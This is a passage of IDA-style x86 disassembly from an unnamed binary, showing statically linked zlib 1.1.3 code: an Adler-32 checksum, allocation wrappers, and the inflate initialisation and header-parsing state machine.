add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+0Ch]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+0Dh]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+0Eh]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+0Fh]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
add eax, 10h
mov [ebp+arg_4], eax
mov ecx, [ebp+var_C]
sub ecx, 10h
mov [ebp+var_C], ecx
jmp loc_42D8A1
; ---------------------------------------------------------------------------
loc_42DA51: ; CODE XREF: sub_42D840+65�j
cmp [ebp+var_C], 0
jz short loc_42DA87
loc_42DA57: ; CODE XREF: sub_42D840+245�j
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+var_C]
sub ecx, 1
mov [ebp+var_C], ecx
cmp [ebp+var_C], 0
jnz short loc_42DA57
loc_42DA87: ; CODE XREF: sub_42D840+215�j
mov eax, [ebp+var_4]
xor edx, edx
mov ecx, 0FFF1h
div ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
xor edx, edx
mov ecx, 0FFF1h
div ecx
mov [ebp+var_8], edx
jmp loc_42D870
; ---------------------------------------------------------------------------
loc_42DAAA: ; CODE XREF: sub_42D840+34�j
mov eax, [ebp+var_8]
shl eax, 10h
or eax, [ebp+var_4]
loc_42DAB3: ; CODE XREF: sub_42D840+2B�j
mov esp, ebp
pop ebp
retn
sub_42D840 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, offset a1_1_3 ; "1.1.3"
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2
sub eax, [ebp+8]
mov eax, off_4332E0[eax*4]
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DAD5 proc near ; DATA XREF: sub_42DBE5+68�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_42DAEC
mov eax, [ebp+arg_8]
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+arg_4], ecx
loc_42DAEC: ; CODE XREF: sub_42DAD5+7�j
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call dword_433208 ; calloc
add esp, 8
pop ebp
retn
sub_42DAD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DAFF proc near ; DATA XREF: sub_42DBE5+85�o
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
call dword_4331D4 ; free
add esp, 4
pop ebp
retn
sub_42DAFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DB11 proc near ; CODE XREF: sub_42DBE5+172�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_42DB23
mov eax, [ebp+arg_0]
cmp dword ptr [eax+1Ch], 0
jnz short loc_42DB2A
loc_42DB23: ; CODE XREF: sub_42DB11+7�j
mov eax, 0FFFFFFFEh
jmp short loc_42DB7A
; ---------------------------------------------------------------------------
loc_42DB2A: ; CODE XREF: sub_42DB11+10�j
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+14h], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx+8], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], 0
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [edx+0Ch]
neg eax
sbb eax, eax
and eax, 7
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx], eax
push 0
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [edx+14h]
push eax
call sub_42AEEE
add esp, 0Ch
xor eax, eax
loc_42DB7A: ; CODE XREF: sub_42DB11+17�j
pop ebp
retn
sub_42DB11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DB7C proc near ; CODE XREF: sub_42DBE5+FE�p
; sub_42DBE5+15F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_42DB97
mov eax, [ebp+arg_0]
cmp dword ptr [eax+1Ch], 0
jz short loc_42DB97
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+24h], 0
jnz short loc_42DB9E
loc_42DB97: ; CODE XREF: sub_42DB7C+7�j
; sub_42DB7C+10�j
mov eax, 0FFFFFFFEh
jmp short loc_42DBE3
; ---------------------------------------------------------------------------
loc_42DB9E: ; CODE XREF: sub_42DB7C+19�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp dword ptr [eax+14h], 0
jz short loc_42DBC0
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+14h]
push ecx
call sub_42C405
add esp, 8
loc_42DBC0: ; CODE XREF: sub_42DB7C+2C�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_0]
call dword ptr [eax+24h]
add esp, 8
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+1Ch], 0
xor eax, eax
loc_42DBE3: ; CODE XREF: sub_42DB7C+20�j
pop ebp
retn
sub_42DB7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DBE5 proc near ; CODE XREF: sub_42F7E0+163�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], offset a1_1_3_0 ; "1.1.3"
mov [ebp+var_C], 38h
cmp [ebp+var_4], 0
jz short loc_42DC16
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
movsx edx, ds:byte_43785C
cmp ecx, edx
jnz short loc_42DC16
cmp [ebp+var_C], 38h
jz short loc_42DC20
loc_42DC16: ; CODE XREF: sub_42DBE5+18�j
; sub_42DBE5+29�j
mov eax, 0FFFFFFFAh
jmp loc_42DD61
; ---------------------------------------------------------------------------
loc_42DC20: ; CODE XREF: sub_42DBE5+2F�j
mov [ebp+var_8], 0FFFFFFF1h
cmp [ebp+arg_0], 0
jnz short loc_42DC37
mov eax, 0FFFFFFFEh
jmp loc_42DD61
; ---------------------------------------------------------------------------
loc_42DC37: ; CODE XREF: sub_42DBE5+46�j
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], 0
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+20h], 0
jnz short loc_42DC5E
mov edx, [ebp+arg_0]
mov dword ptr [edx+20h], offset sub_42DAD5
mov eax, [ebp+arg_0]
mov dword ptr [eax+28h], 0
loc_42DC5E: ; CODE XREF: sub_42DBE5+63�j
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+24h], 0
jnz short loc_42DC71
mov edx, [ebp+arg_0]
mov dword ptr [edx+24h], offset sub_42DAFF
loc_42DC71: ; CODE XREF: sub_42DBE5+80�j
push 18h
push 1
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+20h]
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov [ecx+1Ch], eax
mov edx, [ebp+arg_0]
cmp dword ptr [edx+1Ch], 0
jnz short loc_42DC9E
mov eax, 0FFFFFFFCh
jmp loc_42DD61
; ---------------------------------------------------------------------------
loc_42DC9E: ; CODE XREF: sub_42DBE5+AD�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx+14h], 0
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax+0Ch], 0
cmp [ebp+var_8], 0
jge short loc_42DCD3
mov ecx, [ebp+var_8]
neg ecx
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax+0Ch], 1
loc_42DCD3: ; CODE XREF: sub_42DBE5+D7�j
cmp [ebp+var_8], 8
jl short loc_42DCDF
cmp [ebp+var_8], 0Fh
jle short loc_42DCF2
loc_42DCDF: ; CODE XREF: sub_42DBE5+F2�j
mov ecx, [ebp+arg_0]
push ecx
call sub_42DB7C
add esp, 4
mov eax, 0FFFFFFFEh
jmp short loc_42DD61
; ---------------------------------------------------------------------------
loc_42DCF2: ; CODE XREF: sub_42DBE5+F8�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [ebp+var_8]
mov [eax+10h], ecx
mov edx, 1
mov ecx, [ebp+var_8]
shl edx, cl
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ecx+0Ch]
neg edx
sbb edx, edx
not edx
and edx, offset sub_42D840
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42AFA5
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx+14h], eax
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp dword ptr [ecx+14h], 0
jnz short loc_42DD53
mov edx, [ebp+arg_0]
push edx
call sub_42DB7C
add esp, 4
mov eax, 0FFFFFFFCh
jmp short loc_42DD61
; ---------------------------------------------------------------------------
loc_42DD53: ; CODE XREF: sub_42DBE5+159�j
mov eax, [ebp+arg_0]
push eax
call sub_42DB11
add esp, 4
xor eax, eax
loc_42DD61: ; CODE XREF: sub_42DBE5+36�j
; sub_42DBE5+4D�j ...
mov esp, ebp
pop ebp
retn
sub_42DBE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DD65 proc near ; CODE XREF: sub_42F9A2+26E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_42DD82
mov eax, [ebp+arg_0]
cmp dword ptr [eax+1Ch], 0
jz short loc_42DD82
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 0
jnz short loc_42DD8C
loc_42DD82: ; CODE XREF: sub_42DD65+A�j
; sub_42DD65+13�j
mov eax, 0FFFFFFFEh
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42DD8C: ; CODE XREF: sub_42DD65+1B�j
xor edx, edx
cmp [ebp+arg_4], 4
setnz dl
dec edx
and edx, 0FFFFFFFBh
mov [ebp+arg_4], edx
mov [ebp+var_8], 0FFFFFFFBh
loc_42DDA3: ; CODE XREF: sub_42DD65:loc_42E3E8�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ecx]
mov [ebp+var_C], edx
cmp [ebp+var_C], 0Dh
ja loc_42E3E1
mov eax, [ebp+var_C]
jmp off_42E3F1[eax*4]
loc_42DDC2: ; DATA XREF: HLXc:off_42E3F1�o
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+4], 0
jnz short loc_42DDD3
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42DDD3: ; CODE XREF: sub_42DD65+64�j
mov edx, [ebp+arg_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_0]
mov [edx+4], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov [ecx+4], edx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+4]
and ecx, 0Fh
mov edx, [ebp+arg_0]
mov eax, [edx]
add eax, 1
mov edx, [ebp+arg_0]
mov [edx], eax
cmp ecx, 8
jz short loc_42DE4F
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 0Dh
mov edx, [ebp+arg_0]
mov dword ptr [edx+18h], offset aUnknownCompres ; "unknown compression method"
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx+4], 5
jmp loc_42E3E8
; ---------------------------------------------------------------------------
loc_42DE4F: ; CODE XREF: sub_42DD65+C0�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+4]
shr ecx, 4
add ecx, 8
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp ecx, [eax+10h]
jbe short loc_42DE91
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Dh
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidWindowS ; "invalid window size"
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx+4], 5
jmp loc_42E3E8
; ---------------------------------------------------------------------------
loc_42DE91: ; CODE XREF: sub_42DD65+102�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 1
loc_42DE9D: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E3F5�o
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_42DEAE
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42DEAE: ; CODE XREF: sub_42DD65+13F�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
xor eax, eax
mov al, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [edx+4]
shl eax, 8
add eax, [ebp+var_4]
xor edx, edx
mov ecx, 1Fh
div ecx
test edx, edx
jz short loc_42DF2F
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 0Dh
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+18h], offset aIncorrectHeade ; "incorrect header check"
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax+4], 5
jmp loc_42E3E8
; ---------------------------------------------------------------------------
loc_42DF2F: ; CODE XREF: sub_42DD65+1A0�j
mov ecx, [ebp+var_4]
and ecx, 20h
test ecx, ecx
jnz short loc_42DF4A
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 7
jmp loc_42E3E8
; ---------------------------------------------------------------------------
loc_42DF4A: ; CODE XREF: sub_42DD65+1D2�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 2
loc_42DF56: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E3F9�o
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4], 0
jnz short loc_42DF67
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42DF67: ; CODE XREF: sub_42DD65+1F8�j
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov edx, [ebp+arg_0]
mov eax, [edx]
xor ecx, ecx
mov cl, [eax]
shl ecx, 18h
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [eax+8], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 3
loc_42DFB9: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E3FD�o
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4], 0
jnz short loc_42DFCA
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42DFCA: ; CODE XREF: sub_42DD65+25B�j
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
xor ecx, ecx
mov cl, [edx]
shl ecx, 10h
mov edx, [eax+8]
add edx, ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov [ecx+8], edx
mov edx, [ebp+arg_0]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 4
loc_42E027: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E401�o
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+4], 0
jnz short loc_42E038
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E038: ; CODE XREF: sub_42DD65+2C9�j
mov edx, [ebp+arg_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_0]
mov [edx+4], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ebp+arg_0]
mov eax, [edx]
xor edx, edx
mov dl, [eax]
shl edx, 8
mov eax, [ecx+8]
add eax, edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx+8], eax
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 5
loc_42E095: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E405�o
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_42E0A6
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E0A6: ; CODE XREF: sub_42DD65+337�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [ebp+arg_0]
mov ecx, [eax]
xor eax, eax
mov al, [ecx]
mov ecx, [edx+8]
add ecx, eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [eax+8], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [ebp+arg_0]
mov ecx, [edx+8]
mov [eax+30h], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 6
mov eax, 2
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E119: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E409�o
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Dh
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aNeedDictionary ; "need dictionary"
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx+4], 0
mov eax, 0FFFFFFFEh
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E146: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E40D�o
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+14h]
push ecx
call sub_42B09D
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFDh
jnz short loc_42E187
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 0Dh
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx+4], 0
jmp loc_42E3E8
; ---------------------------------------------------------------------------
loc_42E187: ; CODE XREF: sub_42DD65+402�j
cmp [ebp+var_8], 0
jnz short loc_42E193
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
loc_42E193: ; CODE XREF: sub_42DD65+426�j
cmp [ebp+var_8], 1
jz short loc_42E1A1
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E1A1: ; CODE XREF: sub_42DD65+432�j
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
add eax, 4
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+14h]
push ecx
call sub_42AEEE
add esp, 0Ch
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp dword ptr [eax+0Ch], 0
jz short loc_42E1E4
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Ch
jmp loc_42E3E8
; ---------------------------------------------------------------------------
loc_42E1E4: ; CODE XREF: sub_42DD65+46C�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 8
loc_42E1F0: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E411�o
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_42E201
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E201: ; CODE XREF: sub_42DD65+492�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
xor eax, eax
mov al, [edx]
shl eax, 18h
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx+8], eax
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 9
loc_42E253: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E415�o
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_42E264
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E264: ; CODE XREF: sub_42DD65+4F5�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [ebp+arg_0]
mov ecx, [eax]
xor eax, eax
mov al, [ecx]
shl eax, 10h
mov ecx, [edx+8]
add ecx, eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [eax+8], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Ah
loc_42E2C1: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E419�o
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4], 0
jnz short loc_42E2D2
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E2D2: ; CODE XREF: sub_42DD65+563�j
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
xor ecx, ecx
mov cl, [edx]
shl ecx, 8
mov edx, [eax+8]
add edx, ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov [ecx+8], edx
mov edx, [ebp+arg_0]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 0Bh
loc_42E32F: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E41D�o
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+4], 0
jnz short loc_42E340
mov eax, [ebp+var_8]
jmp loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E340: ; CODE XREF: sub_42DD65+5D1�j
mov edx, [ebp+arg_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_0]
mov [edx+4], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ebp+arg_0]
mov eax, [edx]
xor edx, edx
mov dl, [eax]
mov eax, [ecx+8]
add eax, edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx+8], eax
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [ecx+4]
cmp ecx, [eax+8]
jz short loc_42E3C7
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 0Dh
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+18h], offset aIncorrectDataC ; "incorrect data check"
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax+4], 5
jmp short loc_42E3E8
; ---------------------------------------------------------------------------
loc_42E3C7: ; CODE XREF: sub_42DD65+63B�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Ch
loc_42E3D3: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E421�o
mov eax, 1
jmp short loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E3DA: ; CODE XREF: sub_42DD65+56�j
; DATA XREF: HLXc:0042E425�o
mov eax, 0FFFFFFFDh
jmp short loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E3E1: ; CODE XREF: sub_42DD65+4D�j
mov eax, 0FFFFFFFEh
jmp short loc_42E3ED
; ---------------------------------------------------------------------------
loc_42E3E8: ; CODE XREF: sub_42DD65+E5�j
; sub_42DD65+127�j ...
jmp loc_42DDA3
; ---------------------------------------------------------------------------
loc_42E3ED: ; CODE XREF: sub_42DD65+22�j
; sub_42DD65+69�j ...
mov esp, ebp
pop ebp
retn
sub_42DD65 endp
; ---------------------------------------------------------------------------
off_42E3F1 dd offset loc_42DDC2 ; DATA XREF: sub_42DD65+56�r
dd offset loc_42DE9D
dd offset loc_42DF56
dd offset loc_42DFB9
dd offset loc_42E027
dd offset loc_42E095
dd offset loc_42E119
dd offset loc_42E146
dd offset loc_42E1F0
dd offset loc_42E253
dd offset loc_42E2C1
dd offset loc_42E32F
dd offset loc_42E3D3
dd offset loc_42E3DA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E429 proc near ; CODE XREF: sub_42FFCE+7F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
